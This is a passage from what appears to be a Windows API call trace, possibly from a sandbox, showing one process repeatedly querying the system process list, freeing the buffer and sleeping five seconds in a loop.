ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.078] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.193] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.213] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.222] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.231] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.249] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 